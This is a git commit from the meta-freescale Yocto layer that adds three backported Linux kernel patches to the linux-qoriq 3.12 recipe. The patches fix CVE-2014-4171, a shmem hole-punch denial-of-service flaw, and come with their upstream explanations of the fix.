]> code.ossystems Code Review - meta-freescale.git/commitdiff
mm/shmem: CVE-2014-4171
authorSona Sarmadi <sona.sarmadi@enea.com>
Tue, 17 Feb 2015 11:38:44 +0000 (12:38 +0100)
committerZhenhua Luo <zhenhua.luo@freescale.com>
Fri, 6 Mar 2015 08:28:23 +0000 (16:28 +0800)
Fixes a denial of service flaw in the Linux kernel
built with the shared memory suppor

Reference:
http://www.openwall.com/lists/oss-security/2014/06/18/11
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171

Signed-off-by: Sona Sarmadi <sona.sarmadi@enea.com>
meta-fsl-ppc/recipes-kernel/linux/files/0001-shmem-CVE-2014-4171.patch [new file with mode: 0644]
meta-fsl-ppc/recipes-kernel/linux/files/0002-shmem-CVE-2014-4171.patch [new file with mode: 0644]
meta-fsl-ppc/recipes-kernel/linux/files/0003-shmem-CVE-2014-4171.patch [new file with mode: 0644]
meta-fsl-ppc/recipes-kernel/linux/linux-qoriq_3.12.bb

diff --git a/meta-fsl-ppc/recipes-kernel/linux/files/0001-shmem-CVE-2014-4171.patch b/meta-fsl-ppc/recipes-kernel/linux/files/0001-shmem-CVE-2014-4171.patch
new file mode 100644 (file)
index 0000000..00ead60
--- /dev/null
@@ -0,0 +1,141 @@
+From 8685789bd8ec12a02b07ea76df4527b055efbf20 Mon Sep 17 00:00:00 2001
+From: Hugh Dickins <hughd@google.com>
+Date: Mon, 23 Jun 2014 13:22:06 -0700
+Subject: [PATCH 1/3] shmem: fix faulting into a hole while it's punched
+
+commit f00cdc6df7d7cfcabb5b740911e6788cb0802bdb upstream.
+
+Trinity finds that mmap access to a hole while it's punched from shmem
+can prevent the madvise(MADV_REMOVE) or fallocate(FALLOC_FL_PUNCH_HOLE)
+from completing, until the reader chooses to stop; with the puncher's
+hold on i_mutex locking out all other writers until it can complete.
+
+It appears that the tmpfs fault path is too light in comparison with its
+hole-punching path, lacking an i_data_sem to obstruct it; but we don't
+want to slow down the common case.
+
+Extend shmem_fallocate()'s existing range notification mechanism, so
+shmem_fault() can refrain from faulting pages into the hole while it's
+punched, waiting instead on i_mutex (when safe to sleep; or repeatedly
+faulting when not).
+
+Upstream-Status: Backport
+
+[akpm@linux-foundation.org: coding-style fixes]
+Signed-off-by: Hugh Dickins <hughd@google.com>
+Reported-by: Sasha Levin <sasha.levin@oracle.com>
+Tested-by: Sasha Levin <sasha.levin@oracle.com>
+Cc: Dave Jones <davej@redhat.com>
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+
+Signed-off-by: Jiri Slaby <jslaby@suse.cz>
+Signed-off-by: Sona Sarmadi <sona.sarmadi@enea.com>
+---
+ mm/shmem.c | 56 ++++++++++++++++++++++++++++++++++++++++++++++++++++----
+ 1 file changed, 52 insertions(+), 4 deletions(-)
+
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 8297623..00d412f 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -80,11 +80,12 @@ static struct vfsmount *shm_mnt;
+ #define SHORT_SYMLINK_LEN 128
+ /*
+- * shmem_fallocate and shmem_writepage communicate via inode->i_private
+- * (with i_mutex making sure that it has only one user at a time):
+- * we would prefer not to enlarge the shmem inode just for that.
++ * shmem_fallocate communicates with shmem_fault or shmem_writepage via
++ * inode->i_private (with i_mutex making sure that it has only one user at
++ * a time): we would prefer not to enlarge the shmem inode just for that.
+  */
+ struct shmem_falloc {
++      int     mode;           /* FALLOC_FL mode currently operating */
+       pgoff_t start;          /* start of range currently being fallocated */
+       pgoff_t next;           /* the next page offset to be fallocated */
+       pgoff_t nr_falloced;    /* how many new pages have been fallocated */
+@@ -826,6 +827,7 @@ static int shmem_writepage(struct page *page, struct writeback_control *wbc)
+                       spin_lock(&inode->i_lock);
+                       shmem_falloc = inode->i_private;
+                       if (shmem_falloc &&
++                          !shmem_falloc->mode &&
+                           index >= shmem_falloc->start &&
+                           index < shmem_falloc->next)
+                               shmem_falloc->nr_unswapped++;
+@@ -1300,6 +1302,44 @@ static int shmem_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
+       int error;
+       int ret = VM_FAULT_LOCKED;
++      /*
++       * Trinity finds that probing a hole which tmpfs is punching can
++       * prevent the hole-punch from ever completing: which in turn
++       * locks writers out with its hold on i_mutex.  So refrain from
++       * faulting pages into the hole while it's being punched, and
++       * wait on i_mutex to be released if vmf->flags permits.
++       */
++      if (unlikely(inode->i_private)) {
++              struct shmem_falloc *shmem_falloc;
++
++              spin_lock(&inode->i_lock);
++              shmem_falloc = inode->i_private;
++              if (!shmem_falloc ||
++                  shmem_falloc->mode != FALLOC_FL_PUNCH_HOLE ||
++                  vmf->pgoff < shmem_falloc->start ||
++                  vmf->pgoff >= shmem_falloc->next)
++                      shmem_falloc = NULL;
++              spin_unlock(&inode->i_lock);
++              /*
++               * i_lock has protected us from taking shmem_falloc seriously
++               * once return from shmem_fallocate() went back up that stack.
++               * i_lock does not serialize with i_mutex at all, but it does
++               * not matter if sometimes we wait unnecessarily, or sometimes
++               * miss out on waiting: we just need to make those cases rare.
++               */
++              if (shmem_falloc) {
++                      if ((vmf->flags & FAULT_FLAG_ALLOW_RETRY) &&
++                         !(vmf->flags & FAULT_FLAG_RETRY_NOWAIT)) {
++                              up_read(&vma->vm_mm->mmap_sem);
++                              mutex_lock(&inode->i_mutex);
++                              mutex_unlock(&inode->i_mutex);
++                              return VM_FAULT_RETRY;
++                      }
++                      /* cond_resched? Leave that to GUP or return to user */
++                      return VM_FAULT_NOPAGE;
++              }
++      }
++
+       error = shmem_getpage(inode, vmf->pgoff, &vmf->page, SGP_CACHE, &ret);
+       if (error)
+               return ((error == -ENOMEM) ? VM_FAULT_OOM : VM_FAULT_SIGBUS);
+@@ -1815,18 +1855,26 @@ static long shmem_fallocate(struct file *file, int mode, loff_t offset,
+       mutex_lock(&inode->i_mutex);
++      shmem_falloc.mode = mode & ~FALLOC_FL_KEEP_SIZE;
++
+       if (mode & FALLOC_FL_PUNCH_HOLE) {
+               struct address_space *mapping = file->f_mapping;
+               loff_t unmap_start = round_up(offset, PAGE_SIZE);
+               loff_t unmap_end = round_down(offset + len, PAGE_SIZE) - 1;
++              shmem_falloc.start = unmap_start >> PAGE_SHIFT;
++              shmem_falloc.next = (unmap_end + 1) >> PAGE_SHIFT;
++              spin_lock(&inode->i_lock);
++              inode->i_private = &shmem_falloc;
++              spin_unlock(&inode->i_lock);
++
+               if ((u64)unmap_end > (u64)unmap_start)
+                       unmap_mapping_range(mapping, unmap_start,
+                                           1 + unmap_end - unmap_start, 0);
+               shmem_truncate_range(inode, offset, offset + len - 1);
+               /* No need to unmap again: hole-punching leaves COWed pages */
+               error = 0;
+-              goto out;
++              goto undone;
+       }
+       /* We need to check rlimit even when FALLOC_FL_KEEP_SIZE */
+-- 
+1.9.1
+
diff --git a/meta-fsl-ppc/recipes-kernel/linux/files/0002-shmem-CVE-2014-4171.patch b/meta-fsl-ppc/recipes-kernel/linux/files/0002-shmem-CVE-2014-4171.patch
new file mode 100644 (file)
index 0000000..a43b895
--- /dev/null
@@ -0,0 +1,200 @@
+From 38d05809df1ea5272a658e7f4d5f2a3027ad2fd2 Mon Sep 17 00:00:00 2001
+From: Hugh Dickins <hughd@google.com>
+Date: Wed, 23 Jul 2014 14:00:10 -0700
+Subject: [PATCH 2/3] shmem: fix faulting into a hole, not taking i_mutex
+
+commit 8e205f779d1443a94b5ae81aa359cb535dd3021e upstream.
+
+Commit f00cdc6df7d7 ("shmem: fix faulting into a hole while it's
+punched") was buggy: Sasha sent a lockdep report to remind us that
+grabbing i_mutex in the fault path is a no-no (write syscall may already
+hold i_mutex while faulting user buffer).
+
+We tried a completely different approach (see following patch) but that
+proved inadequate: good enough for a rational workload, but not good
+enough against trinity - which forks off so many mappings of the object
+that contention on i_mmap_mutex while hole-puncher holds i_mutex builds
+into serious starvation when concurrent faults force the puncher to fall
+back to single-page unmap_mapping_range() searches of the i_mmap tree.
+
+So return to the original umbrella approach, but keep away from i_mutex
+this time.  We really don't want to bloat every shmem inode with a new
+mutex or completion, just to protect this unlikely case from trinity.
+So extend the original with wait_queue_head on stack at the hole-punch
+end, and wait_queue item on the stack at the fault end.
+
+This involves further use of i_lock to guard against the races: lockdep
+has been happy so far, and I see fs/inode.c:unlock_new_inode() holds
+i_lock around wake_up_bit(), which is comparable to what we do here.
+i_lock is more convenient, but we could switch to shmem's info->lock.
+
+This issue has been tagged with CVE-2014-4171, which will require commit
+f00cdc6df7d7 and this and the following patch to be backported: we
+suggest to 3.1+, though in fact the trinity forkbomb effect might go
+back as far as 2.6.16, when madvise(,,MADV_REMOVE) came in - or might
+not, since much has changed, with i_mmap_mutex a spinlock before 3.0.
+Anyone running trinity on 3.0 and earlier? I don't think we need care.
+
+Upstream-Status: Backport
+
+Signed-off-by: Hugh Dickins <hughd@google.com>
+Reported-by: Sasha Levin <sasha.levin@oracle.com>
+Tested-by: Sasha Levin <sasha.levin@oracle.com>
+Cc: Vlastimil Babka <vbabka@suse.cz>
+Cc: Konstantin Khlebnikov <koct9i@gmail.com>
+Cc: Johannes Weiner <hannes@cmpxchg.org>
+Cc: Lukas Czerner <lczerner@redhat.com>
+Cc: Dave Jones <davej@redhat.com>
+Cc: <stable@vger.kernel.org>   [3.1+]
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+Signed-off-by: Jiri Slaby <jslaby@suse.cz>
+Signed-off-by: Sona Sarmadi <sona.sarmadi@enea.com>
+---
+ mm/shmem.c | 78 +++++++++++++++++++++++++++++++++++++++++---------------------
+ 1 file changed, 52 insertions(+), 26 deletions(-)
+
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 00d412f..6f5626f 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -85,7 +85,7 @@ static struct vfsmount *shm_mnt;
+  * a time): we would prefer not to enlarge the shmem inode just for that.
+  */
+ struct shmem_falloc {
+-      int     mode;           /* FALLOC_FL mode currently operating */
++      wait_queue_head_t *waitq; /* faults into hole wait for punch to end */
+       pgoff_t start;          /* start of range currently being fallocated */
+       pgoff_t next;           /* the next page offset to be fallocated */
+       pgoff_t nr_falloced;    /* how many new pages have been fallocated */
+@@ -827,7 +827,7 @@ static int shmem_writepage(struct page *page, struct writeback_control *wbc)
+                       spin_lock(&inode->i_lock);
+                       shmem_falloc = inode->i_private;
+                       if (shmem_falloc &&
+-                          !shmem_falloc->mode &&
++                          !shmem_falloc->waitq &&
+                           index >= shmem_falloc->start &&
+                           index < shmem_falloc->next)
+                               shmem_falloc->nr_unswapped++;
+@@ -1306,38 +1306,58 @@ static int shmem_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
+        * Trinity finds that probing a hole which tmpfs is punching can
+        * prevent the hole-punch from ever completing: which in turn
+        * locks writers out with its hold on i_mutex.  So refrain from
+-       * faulting pages into the hole while it's being punched, and
+-       * wait on i_mutex to be released if vmf->flags permits.
++       * faulting pages into the hole while it's being punched.  Although
++       * shmem_undo_range() does remove the additions, it may be unable to
++       * keep up, as each new page needs its own unmap_mapping_range() call,
++       * and the i_mmap tree grows ever slower to scan if new vmas are added.
++       *
++       * It does not matter if we sometimes reach this check just before the
++       * hole-punch begins, so that one fault then races with the punch:
++       * we just need to make racing faults a rare case.
++       *
++       * The implementation below would be much simpler if we just used a
++       * standard mutex or completion: but we cannot take i_mutex in fault,
++       * and bloating every shmem inode for this unlikely case would be sad.
+        */
+       if (unlikely(inode->i_private)) {
+               struct shmem_falloc *shmem_falloc;
+               spin_lock(&inode->i_lock);
+               shmem_falloc = inode->i_private;
+-              if (!shmem_falloc ||
+-                  shmem_falloc->mode != FALLOC_FL_PUNCH_HOLE ||
+-                  vmf->pgoff < shmem_falloc->start ||
+-                  vmf->pgoff >= shmem_falloc->next)
+-                      shmem_falloc = NULL;
+-              spin_unlock(&inode->i_lock);
+-              /*
+-               * i_lock has protected us from taking shmem_falloc seriously
+-               * once return from shmem_fallocate() went back up that stack.
+-               * i_lock does not serialize with i_mutex at all, but it does
+-               * not matter if sometimes we wait unnecessarily, or sometimes
+-               * miss out on waiting: we just need to make those cases rare.
+-               */
+-              if (shmem_falloc) {
++              if (shmem_falloc &&
++                  shmem_falloc->waitq &&
++                  vmf->pgoff >= shmem_falloc->start &&
++                  vmf->pgoff < shmem_falloc->next) {
++                      wait_queue_head_t *shmem_falloc_waitq;
++                      DEFINE_WAIT(shmem_fault_wait);
++
++                      ret = VM_FAULT_NOPAGE;
+                       if ((vmf->flags & FAULT_FLAG_ALLOW_RETRY) &&
+                          !(vmf->flags & FAULT_FLAG_RETRY_NOWAIT)) {
++                              /* It's polite to up mmap_sem if we can */
+                               up_read(&vma->vm_mm->mmap_sem);
+-                              mutex_lock(&inode->i_mutex);
+-                              mutex_unlock(&inode->i_mutex);
+-                              return VM_FAULT_RETRY;
++                              ret = VM_FAULT_RETRY;
+                       }
+-                      /* cond_resched? Leave that to GUP or return to user */
+-                      return VM_FAULT_NOPAGE;
++
++                      shmem_falloc_waitq = shmem_falloc->waitq;
++                      prepare_to_wait(shmem_falloc_waitq, &shmem_fault_wait,
++                                      TASK_UNINTERRUPTIBLE);
++                      spin_unlock(&inode->i_lock);
++                      schedule();
++
++                      /*
++                       * shmem_falloc_waitq points into the shmem_fallocate()
++                       * stack of the hole-punching task: shmem_falloc_waitq
++                       * is usually invalid by the time we reach here, but
++                       * finish_wait() does not dereference it in that case;
++                       * though i_lock needed lest racing with wake_up_all().
++                       */
++                      spin_lock(&inode->i_lock);
++                      finish_wait(shmem_falloc_waitq, &shmem_fault_wait);
++                      spin_unlock(&inode->i_lock);
++                      return ret;
+               }
++              spin_unlock(&inode->i_lock);
+       }
+       error = shmem_getpage(inode, vmf->pgoff, &vmf->page, SGP_CACHE, &ret);
+@@ -1855,13 +1875,13 @@ static long shmem_fallocate(struct file *file, int mode, loff_t offset,
+       mutex_lock(&inode->i_mutex);
+-      shmem_falloc.mode = mode & ~FALLOC_FL_KEEP_SIZE;
+-
+       if (mode & FALLOC_FL_PUNCH_HOLE) {
+               struct address_space *mapping = file->f_mapping;
+               loff_t unmap_start = round_up(offset, PAGE_SIZE);
+               loff_t unmap_end = round_down(offset + len, PAGE_SIZE) - 1;
++              DECLARE_WAIT_QUEUE_HEAD_ONSTACK(shmem_falloc_waitq);
++              shmem_falloc.waitq = &shmem_falloc_waitq;
+               shmem_falloc.start = unmap_start >> PAGE_SHIFT;
+               shmem_falloc.next = (unmap_end + 1) >> PAGE_SHIFT;
+               spin_lock(&inode->i_lock);
+@@ -1873,8 +1893,13 @@ static long shmem_fallocate(struct file *file, int mode, loff_t offset,
+                                           1 + unmap_end - unmap_start, 0);
+               shmem_truncate_range(inode, offset, offset + len - 1);
+               /* No need to unmap again: hole-punching leaves COWed pages */
++
++              spin_lock(&inode->i_lock);
++              inode->i_private = NULL;
++              wake_up_all(&shmem_falloc_waitq);
++              spin_unlock(&inode->i_lock);
+               error = 0;
+-              goto undone;
++              goto out;
+       }
+       /* We need to check rlimit even when FALLOC_FL_KEEP_SIZE */
+@@ -1890,6 +1915,7 @@ static long shmem_fallocate(struct file *file, int mode, loff_t offset,
+               goto out;
+       }
++      shmem_falloc.waitq = NULL;
+       shmem_falloc.start = start;
+       shmem_falloc.next  = start;
+       shmem_falloc.nr_falloced = 0;
+-- 
+1.9.1
+
diff --git a/meta-fsl-ppc/recipes-kernel/linux/files/0003-shmem-CVE-2014-4171.patch b/meta-fsl-ppc/recipes-kernel/linux/files/0003-shmem-CVE-2014-4171.patch
new file mode 100644 (file)
index 0000000..2b70ec1
--- /dev/null
@@ -0,0 +1,134 @@
+From a428dc008e435c5a36b1288fb5b8c4b58472e28c Mon Sep 17 00:00:00 2001
+From: Hugh Dickins <hughd@google.com>
+Date: Wed, 23 Jul 2014 14:00:13 -0700
+Subject: [PATCH 3/3] shmem: fix splicing from a hole while it's punched
+
+commit b1a366500bd537b50c3aad26dc7df083ec03a448 upstream.
+
+shmem_fault() is the actual culprit in trinity's hole-punch starvation,
+and the most significant cause of such problems: since a page faulted is
+one that then appears page_mapped(), needing unmap_mapping_range() and
+i_mmap_mutex to be unmapped again.
+
+But it is not the only way in which a page can be brought into a hole in
+the radix_tree while that hole is being punched; and Vlastimil's testing
+implies that if enough other processors are busy filling in the hole,
+then shmem_undo_range() can be kept from completing indefinitely.
+
+shmem_file_splice_read() is the main other user of SGP_CACHE, which can
+instantiate shmem pagecache pages in the read-only case (without holding
+i_mutex, so perhaps concurrently with a hole-punch).  Probably it's
+silly not to use SGP_READ already (using the ZERO_PAGE for holes): which
+ought to be safe, but might bring surprises - not a change to be rushed.
+
+shmem_read_mapping_page_gfp() is an internal interface used by
+drivers/gpu/drm GEM (and next by uprobes): it should be okay.  And
+shmem_file_read_iter() uses the SGP_DIRTY variant of SGP_CACHE, when
+called internally by the kernel (perhaps for a stacking filesystem,
+which might rely on holes to be reserved): it's unclear whether it could
+be provoked to keep hole-punch busy or not.
+
+We could apply the same umbrella as now used in shmem_fault() to
+shmem_file_splice_read() and the others; but it looks ugly, and use over
+a range raises questions - should it actually be per page? can these get
+starved themselves?
+
+The origin of this part of the problem is my v3.1 commit d0823576bf4b
+("mm: pincer in truncate_inode_pages_range"), once it was duplicated
+into shmem.c.  It seemed like a nice idea at the time, to ensure
+(barring RCU lookup fuzziness) that there's an instant when the entire
+hole is empty; but the indefinitely repeated scans to ensure that make
+it vulnerable.
+
+Revert that "enhancement" to hole-punch from shmem_undo_range(), but
+retain the unproblematic rescanning when it's truncating; add a couple
+of comments there.
+
+Remove the "indices[0] >= end" test: that is now handled satisfactorily
+by the inner loop, and mem_cgroup_uncharge_start()/end() are too light
+to be worth avoiding here.
+
+But if we do not always loop indefinitely, we do need to handle the case
+of swap swizzled back to page before shmem_free_swap() gets it: add a
+retry for that case, as suggested by Konstantin Khlebnikov; and for the
+case of page swizzled back to swap, as suggested by Johannes Weiner.
+
+Upstream-Status: Backport
+
+Signed-off-by: Hugh Dickins <hughd@google.com>
+Reported-by: Sasha Levin <sasha.levin@oracle.com>
+Suggested-by: Vlastimil Babka <vbabka@suse.cz>
+Cc: Konstantin Khlebnikov <koct9i@gmail.com>
+Cc: Johannes Weiner <hannes@cmpxchg.org>
+Cc: Lukas Czerner <lczerner@redhat.com>
+Cc: Dave Jones <davej@redhat.com>
+Cc: <stable@vger.kernel.org>   [3.1+]
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+Signed-off-by: Jiri Slaby <jslaby@suse.cz>
+Signed-off-by: Sona Sarmadi <sona.sarmadi@enea.com>
+---
+ mm/shmem.c | 24 +++++++++++++++---------
+ 1 file changed, 15 insertions(+), 9 deletions(-)
+
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 6f5626f..0da81aa 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -534,22 +534,19 @@ static void shmem_undo_range(struct inode *inode, loff_t lstart, loff_t lend,
+               return;
+       index = start;
+-      for ( ; ; ) {
++      while (index < end) {
+               cond_resched();
+               pvec.nr = shmem_find_get_pages_and_swap(mapping, index,
+                               min(end - index, (pgoff_t)PAGEVEC_SIZE),
+                                                       pvec.pages, indices);
+               if (!pvec.nr) {
+-                      if (index == start || unfalloc)
++                      /* If all gone or hole-punch or unfalloc, we're done */
++                      if (index == start || end != -1)
+                               break;
++                      /* But if truncating, restart to make sure all gone */
+                       index = start;
+                       continue;
+               }
+-              if ((index == start || unfalloc) && indices[0] >= end) {
+-                      shmem_deswap_pagevec(&pvec);
+-                      pagevec_release(&pvec);
+-                      break;
+-              }
+               mem_cgroup_uncharge_start();
+               for (i = 0; i < pagevec_count(&pvec); i++) {
+                       struct page *page = pvec.pages[i];
+@@ -561,8 +558,12 @@ static void shmem_undo_range(struct inode *inode, loff_t lstart, loff_t lend,
+                       if (radix_tree_exceptional_entry(page)) {
+                               if (unfalloc)
+                                       continue;
+-                              nr_swaps_freed += !shmem_free_swap(mapping,
+-                                                              index, page);
++                              if (shmem_free_swap(mapping, index, page)) {
++                                      /* Swap was replaced by page: retry */
++                                      index--;
++                                      break;
++                              }
++                              nr_swaps_freed++;
+                               continue;
+                       }
+@@ -571,6 +572,11 @@ static void shmem_undo_range(struct inode *inode, loff_t lstart, loff_t lend,
+                               if (page->mapping == mapping) {
+                                       VM_BUG_ON(PageWriteback(page));
+                                       truncate_inode_page(mapping, page);
++                              } else {
++                                      /* Page was replaced by swap: retry */
++                                      unlock_page(page);
++                                      index--;
++                                      break;
+                               }
+                       }
+                       unlock_page(page);
+-- 
+1.9.1
+
index 7bf8b223cc38715b4b15c920bdbf2b5bc9447d2c..9727a7341f7c82443f73f9dc9b38eac7fb549f62 100644 (file)
@@ -31,6 +31,9 @@ SRC_URI = "git://git.freescale.com/ppc/sdk/linux.git;nobranch=1 \
     file://0002-ALSA-CVE-2014-4656.patch \
     file://target-CVE-2014-4027.patch \
     file://mm-2014-3122.patch \
+    file://0001-shmem-CVE-2014-4171.patch \
+    file://0002-shmem-CVE-2014-4171.patch \
+    file://0003-shmem-CVE-2014-4171.patch \
 "
 SRCREV = "6619b8b55796cdf0cec04b66a71288edd3057229"